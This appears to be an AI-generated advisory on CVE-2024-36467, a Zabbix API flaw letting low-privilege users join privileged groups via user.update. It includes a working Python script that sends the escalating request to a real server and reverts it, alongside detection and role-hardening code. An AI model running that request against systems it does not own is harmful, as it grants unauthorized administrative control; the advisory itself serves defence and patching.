CVE-2024-36467 Overview
CVE-2024-36467 is an improper authorization flaw (CWE-285) in the Zabbix API that lets an authenticated user escalate their privileges. Any user whose role permits API calls, which includes the default User role, can call the user.update method on their own account and set the usrgrps property, adding the account to any enabled user group, including privileged groups such as Zabbix Administrators. The only groups that cannot be joined this way are groups that are disabled or whose frontend access is disabled, because the API already refuses to let users put their own account into such a group. User group membership carries the host group permissions and frontend access settings assigned to the group, so a low-privileged user can obtain read-write access to every host those groups can see and change the monitoring configuration for them.
Critical Impact
Any authenticated user whose role allows API access can add their own account to enabled user groups with a single user.update call and acquire the host group permissions and frontend access those groups grant. With membership in a group that has read-write rights on host groups, the attacker can read the data collected from those hosts and change their items, triggers and other configuration, which puts the monitoring of those systems under the attacker's control.
Affected Products
- Zabbix releases before the fix in each supported release line (see the Zabbix Issue Tracker Entry for the exact version ranges)
- Any installation that exposes the API to ordinary users; the built-in User role ships with API access enabled and no method restrictions, so a default deployment is affected
- Installations whose users hold custom roles that permit the user.update method
Discovery Timeline
- 2024-11-27 - CVE-2024-36467 published to NVD
- 2025-10-08 - Last updated in NVD database
Technical Details for CVE-2024-36467
Vulnerability Analysis
This vulnerability stems from improper authorization in the Zabbix API's user.update method. A non-superadmin user is permitted to update their own account (this is how profile settings are changed), and the usrgrps property was accepted on such a self-update without any check that the caller is allowed to change group membership. Because the default User role already has API access enabled, the attacker needs no special configuration. The attack is carried out over the network with low complexity, needs only a low-privilege authenticated session or API token, and involves no user interaction.
An attacker who gains a group's permissions can read confidential monitoring data from the hosts that group may see, change the configuration of those hosts, and, through those configuration changes, degrade the monitoring itself. The only groups an attacker cannot join this way are groups that are disabled or that have frontend access disabled: the API already rejects a user's attempt to put their own account into such a group, and that pre-existing check is why the advisory excludes them.
Root Cause
The root cause is classified as CWE-285 (Improper Authorization). When user.update processes a request in which a user modifies their own record, it does not verify that the requesting user is permitted to change the usrgrps property; the existing self-update restrictions cover only disabled groups and groups without frontend access. A property that should be writable only by a superadmin is therefore writable by the account it belongs to, which bypasses the intended access control model.
Attack Vector
The attack runs over the network against the JSON-RPC endpoint (api_jsonrpc.php) and needs only an authenticated low-privilege session or API token. The attacker sends user.update with userid set to their own ID and usrgrps set to an array of {usrgrpid} objects that includes a privileged group such as Zabbix Administrators. Because usrgrps replaces the entire membership list, the request normally carries the existing groups plus the target; the server applies it without an authorization check and the account becomes a member of the target group. Group IDs do not need to be looked up: they are small integers, and in a default installation the built-in Zabbix administrators group has usrgrpid 7.
The exploitation flow involves:
- Authenticating to the API with user.login using a low-privileged account (passing userData: true returns the caller's own userid together with the session token)
- Identifying the usrgrpid of the target group; in a default installation the built-in Zabbix administrators group is usrgrpid 7, and other IDs are small sequential integers
- Sending a user.update request with userid set to the attacker's own ID and usrgrps set to the current groups plus the target group
- Using the host group permissions and frontend access of the new group on subsequent requests
For technical details on the exploitation mechanism, refer to the Zabbix Issue Tracker Entry.
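The request sequence above, as an added example that is not part of the original page or of Zabbix's own code: a minimal JSON-RPC client with an injectable transport, a check that logs in as a throwaway low-privilege account and attempts to add that same account to a group via user.update, and a constructed FakeZabbix simulation so the flow runs offline. The host name in http_transport is hypothetical, the simulated error messages are invented and labelled as such, and the Bearer header versus the older auth field is a choice you select with legacy_auth. Run the check only against your own instance, with a test account and a harmless test group, never a real administrative group: on an unpatched server the membership change really happens, and the function reverts it afterwards using the same flaw.

```python
# Added example, not Zabbix project code: rehearses the user.update request
# sequence through a JSON-RPC client with an injectable transport, first against
# the constructed FakeZabbix below and then, via http_transport, against your own instance.
import json
import urllib.request
from typing import Any, Callable, Dict, List, Optional

Transport = Callable[[Dict[str, Any], Optional[str]], Dict[str, Any]]


def http_transport(url: str) -> Transport:
    """POST to a real endpoint, e.g. https://zabbix.example/api_jsonrpc.php (hypothetical host)."""
    def send(payload: Dict[str, Any], token: Optional[str]) -> Dict[str, Any]:
        headers = {"Content-Type": "application/json-rpc"}
        if token:
            headers["Authorization"] = f"Bearer {token}"
        req = urllib.request.Request(url, data=json.dumps(payload).encode(), headers=headers)
        with urllib.request.urlopen(req, timeout=15) as resp:
            return json.load(resp)
    return send


class ZabbixRpc:
    """Minimal JSON-RPC 2.0 caller; returns the raw response so callers can inspect "error"."""

    def __init__(self, transport: Transport, legacy_auth: bool = False):
        self._send, self._legacy_auth, self._id = transport, legacy_auth, 0

    def call(self, method: str, params: Any, token: Optional[str] = None) -> Dict[str, Any]:
        self._id += 1
        payload = {"jsonrpc": "2.0", "method": method, "params": params, "id": self._id}
        if token and self._legacy_auth:
            payload["auth"] = token  # session field for servers that predate the Bearer header
        return self._send(payload, token)


def check_self_group_change(rpc: ZabbixRpc, username: str, password: str,
                            target_usrgrpid: str) -> Dict[str, Any]:
    """Log in as a throwaway low-privilege user and try to add that same account to a test group.
    On an unpatched server the change really happens; it is reverted afterwards using the same flaw."""
    login = rpc.call("user.login", {"username": username, "password": password, "userData": True})
    if "error" in login:
        return {"vulnerable": None, "stage": "login", "error": login["error"].get("data")}
    token, userid = login["result"]["sessionid"], login["result"]["userid"]
    me = rpc.call("user.get", {"userids": [userid], "output": ["userid"],
                               "selectUsrgrps": ["usrgrpid"]}, token)
    before: List[str] = [g["usrgrpid"] for g in me["result"][0]["usrgrps"]]
    # usrgrps replaces the whole membership list, so the existing groups are resent
    wanted = [{"usrgrpid": g} for g in before + [target_usrgrpid]]
    attempt = rpc.call("user.update", {"userid": userid, "usrgrps": wanted}, token)
    outcome: Dict[str, Any] = {"vulnerable": "error" not in attempt, "stage": "update",
                               "error": None, "groups_before": before}
    if "error" in attempt:
        outcome["error"] = attempt["error"].get("data") or attempt["error"].get("message")
    else:
        revert = rpc.call("user.update", {"userid": userid,
                                          "usrgrps": [{"usrgrpid": g} for g in before]}, token)
        outcome["reverted"] = "error" not in revert
    rpc.call("user.logout", [], token)
    return outcome


class FakeZabbix:
    """Constructed stand-in for the API (not a real server); models only the calls used above."""

    def __init__(self, patched: bool):
        self.patched = patched
        self.users = {"42": {"username": "lowpriv", "password": "s3cret", "usrgrps": ["8"]}}
        self.sessions: Dict[str, str] = {}

    def __call__(self, payload: Dict[str, Any], token: Optional[str]) -> Dict[str, Any]:
        method, params, rid = payload["method"], payload["params"], payload["id"]
        ok = lambda r: {"jsonrpc": "2.0", "result": r, "id": rid}
        err = lambda d: {"jsonrpc": "2.0", "id": rid,
                         "error": {"code": -32602, "message": "Invalid params.", "data": d}}
        if method == "user.login":
            for uid, u in self.users.items():
                if (u["username"], u["password"]) == (params["username"], params["password"]):
                    self.sessions[f"sess-{uid}"] = uid
                    return ok({"sessionid": f"sess-{uid}", "userid": uid})
            return err("login failed (simulated message)")
        uid = self.sessions.get(token or "")
        if uid is None:
            return err("not authenticated (simulated message)")
        if method == "user.get":
            return ok([{"userid": u, "usrgrps": [{"usrgrpid": g} for g in self.users[u]["usrgrps"]]}
                       for u in params["userids"] if u in self.users])
        if method == "user.update":
            if params["userid"] != uid:
                return err("cannot edit other users (simulated message)")
            if self.patched and "usrgrps" in params:
                return err("own group membership is read-only (simulated message)")  # fixed behaviour
            self.users[uid]["usrgrps"] = [g["usrgrpid"] for g in params["usrgrps"]]  # the vulnerable path
            return ok({"userids": [uid]})
        if method == "user.logout":
            self.sessions.pop(token, None)
            return ok(True)
        return err(f"{method} is not modelled")
```

To try it offline, call check_self_group_change(ZabbixRpc(FakeZabbix(patched=False)), "lowpriv", "s3cret", "7") and compare with patched=True; against a real instance replace the FakeZabbix with http_transport("https://.../api_jsonrpc.php") and pass legacy_auth=True if the server expects the session in the auth field. The function reports the server's error data when the update is refused, so the same run documents which message your version returns.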
Detection Methods for CVE-2024-36467
Indicators of Compromise
- Audit log entries of resource type User and action Update whose details change user.usrgrps, where the acting user ID equals the ID of the user record that was changed
- user.update requests that carry a usrgrps parameter and originate from accounts holding the User role or another non-superadmin role
- Accounts appearing in privileged groups (e.g. Zabbix administrators) without a matching administrative change record
- API activity from accounts that normally use only the frontend, or from source addresses those accounts have not used before
Detection Strategies
- Review the Zabbix audit log (Reports → Audit log, or the auditlog.get API method available from 6.0 onward) for user record updates whose details include usrgrps changes; each entry records the acting user, the ID of the user record changed and the changed properties
- Alert when the acting user is not a superadmin and the entry changes group membership, and treat a self-modification (acting user and changed user are the same account) as the signature of this flaw
- Reconcile membership of sensitive groups against an approved list on a schedule, since an attacker can remove themselves again after using the access
- Log API requests at the reverse proxy or web server (method name and params from the JSON-RPC body) so user.update calls can be correlated with audit entries even after audit retention has expired
Monitoring Recommendations
- Keep the Zabbix audit log enabled (it is on by default) with retention long enough to cover an investigation window
- Forward audit entries and web server access logs for api_jsonrpc.php to the SIEM and write a rule for user record updates in which the acting user and the changed user are the same account and the details include usrgrps
- Baseline API usage per role: most User-role accounts never call user.update, so any such call from them deserves review
- Alert in near real time on membership changes to sensitive groups and on any group membership granted by a non-superadmin actor
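The detection strategies and monitoring recommendations above, as an added example that is not part of the original page or of Zabbix's own code. It runs the matching logic over audit records shaped like the objects auditlog.get returns (userid and username identify who acted, resourceid identifies which user record changed, details holds the JSON diff). The sample records are constructed, the superadmin and sensitive-group IDs are those of a default installation (Admin is userid 1, Zabbix administrators is usrgrpid 7), and the details key layout ("user.usrgrps[<id>].usrgrpid": ["add", "<usrgrpid>"]) is modelled on the audit diff format; confirm it against an export from your own version before relying on the matcher.

```python
# Added example, not Zabbix project code: flags user group membership changes in
# audit records shaped like auditlog.get output. Sample records are constructed and
# the details key layout is modelled on the audit diff format (verify on your version).
import json
from dataclasses import dataclass
from typing import Any, Dict, Iterable, List, Set

AUDIT_ACTION_UPDATE = 1      # auditlog 'action' value for an update
AUDIT_RESOURCE_USER = 0      # auditlog 'resourcetype' value for a user record


@dataclass
class Finding:
    auditid: str
    actor: str            # userid of the account that made the change
    target_userid: str    # userid of the account whose groups changed
    added_groups: List[str]
    severity: str
    reason: str


def group_changes(details: str) -> Dict[str, Any]:
    """Pull group additions and removals out of an audit 'details' JSON diff."""
    added: List[str] = []
    removed = 0
    for key, change in json.loads(details or "{}").items():
        if not key.startswith("user.usrgrps["):
            continue
        if key.endswith(".usrgrpid") and change[0] == "add":
            added.append(str(change[1]))
        elif not key.endswith(".usrgrpid") and change[0] == "delete":
            removed += 1      # the removed group's id is not in the diff, only the fact of removal
    return {"added": added, "removed": removed}


def analyze(entries: Iterable[Dict[str, Any]], superadmins: Set[str],
            sensitive_groups: Dict[str, str]) -> List[Finding]:
    """Flag group-membership changes that break the expected access-control model."""
    findings: List[Finding] = []
    for e in entries:
        if int(e["resourcetype"]) != AUDIT_RESOURCE_USER or int(e["action"]) != AUDIT_ACTION_UPDATE:
            continue
        chg = group_changes(e.get("details", ""))
        if not chg["added"] and not chg["removed"]:
            continue                                   # profile edits, password changes, etc.
        actor, target = str(e["userid"]), str(e["resourceid"])
        touched_sensitive = [g for g in chg["added"] if g in sensitive_groups]
        if actor == target:
            # the exact shape of CVE-2024-36467: an account rewriting its own usrgrps
            sev = "high" if actor not in superadmins else "medium"
            reason = "self-modification of user group membership"
        elif actor not in superadmins:
            sev, reason = "high", "non-superadmin changed another user's group membership"
        elif touched_sensitive:
            sev, reason = "info", "superadmin added a user to a sensitive group; match to a change record"
        else:
            continue
        findings.append(Finding(str(e["auditid"]), actor, target, chg["added"], sev, reason))
    return findings


SUPERADMINS = {"1"}                                   # Admin's userid in a default installation
SENSITIVE_GROUPS = {"7": "Zabbix administrators"}     # usrgrpid 7 in a default installation

SAMPLE_ENTRIES = [  # constructed records in auditlog.get shape
    {"auditid": "1001", "userid": "42", "username": "lowpriv", "clock": "1732700000", "ip": "10.0.0.5",
     "action": "1", "resourcetype": "0", "resourceid": "42", "resourcename": "lowpriv",
     "details": json.dumps({"user.usrgrps[15]": ["add"], "user.usrgrps[15].usrgrpid": ["add", "7"],
                            "user.usrgrps[15].id": ["add", "15"]})},
    {"auditid": "1002", "userid": "1", "username": "Admin", "clock": "1732700100", "ip": "10.0.0.9",
     "action": "1", "resourcetype": "0", "resourceid": "43", "resourcename": "oncall",
     "details": json.dumps({"user.usrgrps[16]": ["add"], "user.usrgrps[16].usrgrpid": ["add", "7"]})},
    {"auditid": "1003", "userid": "42", "username": "lowpriv", "clock": "1732700200", "ip": "10.0.0.5",
     "action": "1", "resourcetype": "0", "resourceid": "42", "resourcename": "lowpriv",
     "details": json.dumps({"user.lang": ["update", "en_US", "default"]})},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_ENTRIES, SUPERADMINS, SENSITIVE_GROUPS):
        print(f.severity.upper(), f.auditid, f.actor, "->", f.target_userid, f.added_groups, f.reason)
```

In production, feed analyze() the result of auditlog.get filtered to resource type User, build the superadmin set from user.get with the role type selected, and keep the sensitive-group map in configuration; the self-modification rule fires regardless of which group was joined because membership in any group that an attacker chose for themselves is the escalation, while the sensitive-group list only raises the severity.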
How to Mitigate CVE-2024-36467
Immediate Actions Required
- Compare current user group memberships against what was expected; treat every account that appears in a privileged group without a change record as a potential escalation
- Audit which roles have API access and which methods they may call, and block user.update through the role's API method rules wherever users do not need it
- Limit network access to the API endpoint (api_jsonrpc.php) to trusted networks and automation hosts
- Search the audit log for user record updates in which the acting user and the changed user are the same account and the details include usrgrps
Patch Information
Zabbix addressed this vulnerability in the 6.0, 6.4 and 7.0 release lines. Consult the Zabbix Issue Tracker Entry for the exact affected and fixed versions, and upgrade every affected installation as soon as possible. Patching is the only complete fix; the role and network controls below reduce exposure but do not remove the flaw.
Workarounds
- Disable API access in the User role, and in any other role held by ordinary users, if those users do not need the API; the setting is part of the role's API access rules
- Where API access is required, put user.update on the role's API method deny list, or switch the role to an allow list containing only the methods those users need; this blocks the vulnerable call without affecting the frontend
- Restrict the API endpoint (api_jsonrpc.php) at the network or reverse proxy level to trusted sources and automation hosts
- Do not try to protect administrative groups by disabling them or removing their frontend access: those are the conditions under which the existing self-add check refuses the request, but they also lock the administrators out, so this is not a usable mitigation
- A WAF rule can flag or block JSON-RPC requests whose method is user.update and whose params contain usrgrps, but without session context it cannot tell an administrator's legitimate change from an attack, so treat it as a detection aid rather than a control
- Adding authentication factors to frontend login does not address this issue, because the attack runs over the API with an already valid session or API token
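The role-based workaround above, as an added example that is not part of the original page or of Zabbix's own code: it evaluates a role's API method rules and rewrites them so the role can no longer call user.update. The rule property names (api.access, api.mode, api) follow the role object of the Zabbix API, where api.mode 0 is a deny list and 1 an allow list and entries may use "*" wildcards such as "user.*"; the sample rule sets are constructed, the role ID in the demo is hypothetical, and the assumption that role.update leaves rule groups you do not pass unchanged should be confirmed against your version's API reference before applying the generated request.

```python
# Added example, not Zabbix project code: evaluates and rewrites a role's API
# method rules (api.access / api.mode / api) so that user.update is refused.
# Sample rule sets are constructed; confirm role.update semantics for your version.
import json
import re
from typing import Any, Dict, List


def method_matches(pattern: str, method: str) -> bool:
    """Zabbix-style match: '*' spans any characters, everything else is literal, case-insensitive."""
    regex = ".*".join(re.escape(part) for part in pattern.lower().split("*"))
    return re.fullmatch(regex, method.lower()) is not None


def role_allows(rules: Dict[str, Any], method: str) -> bool:
    """Decide whether a role with these rules may call the given API method."""
    if str(rules.get("api.access", "1")) == "0":
        return False                                    # API disabled for the role entirely
    listed = any(method_matches(p, method) for p in rules.get("api", []))
    allow_list = str(rules.get("api.mode", "0")) == "1"
    return listed if allow_list else not listed


def deny_method(rules: Dict[str, Any], method: str) -> Dict[str, Any]:
    """Return the api.* rule properties that make the role unable to call `method`."""
    patterns: List[str] = list(rules.get("api", []))
    allow_list = str(rules.get("api.mode", "0")) == "1"
    if allow_list:
        # drop every allow entry that would admit the method; a broad wildcard such as
        # "user.*" loses its other methods too, so re-add those explicitly if needed
        patterns = [p for p in patterns if not method_matches(p, method)]
    elif not any(method_matches(p, method) for p in patterns):
        patterns.append(method)
    return {"api.access": str(rules.get("api.access", "1")),
            "api.mode": "1" if allow_list else "0", "api": patterns}


def role_update_request(roleid: str, rules: Dict[str, Any], request_id: int = 1) -> Dict[str, Any]:
    """JSON-RPC body for role.update (assumed: rule groups not passed are left unchanged)."""
    return {"jsonrpc": "2.0", "method": "role.update", "id": request_id,
            "params": {"roleid": roleid, "rules": rules}}


# Constructed rule sets. The first mirrors the built-in User role's defaults:
# API enabled, deny-list mode, nothing listed, so every method is callable.
DEFAULT_USER_ROLE = {"api.access": "1", "api.mode": "0", "api": []}
ALLOW_LIST_ROLE = {"api.access": "1", "api.mode": "1", "api": ["user.*", "host.get"]}

if __name__ == "__main__":
    for name, rules in (("default", DEFAULT_USER_ROLE), ("allow-list", ALLOW_LIST_ROLE)):
        hardened = deny_method(rules, "user.update")
        print(name, "user.update before:", role_allows(rules, "user.update"),
              "after:", role_allows(hardened, "user.update"))
        print(json.dumps(role_update_request("99", hardened)))   # "99" is a hypothetical roleid
```

Fetch the live rules with role.get (selectRules) for each role ordinary users hold, run them through role_allows() to confirm the exposure, and send the request built by role_update_request() with a superadmin session; rerun role_allows() on the result of a fresh role.get to verify the change took effect.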
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.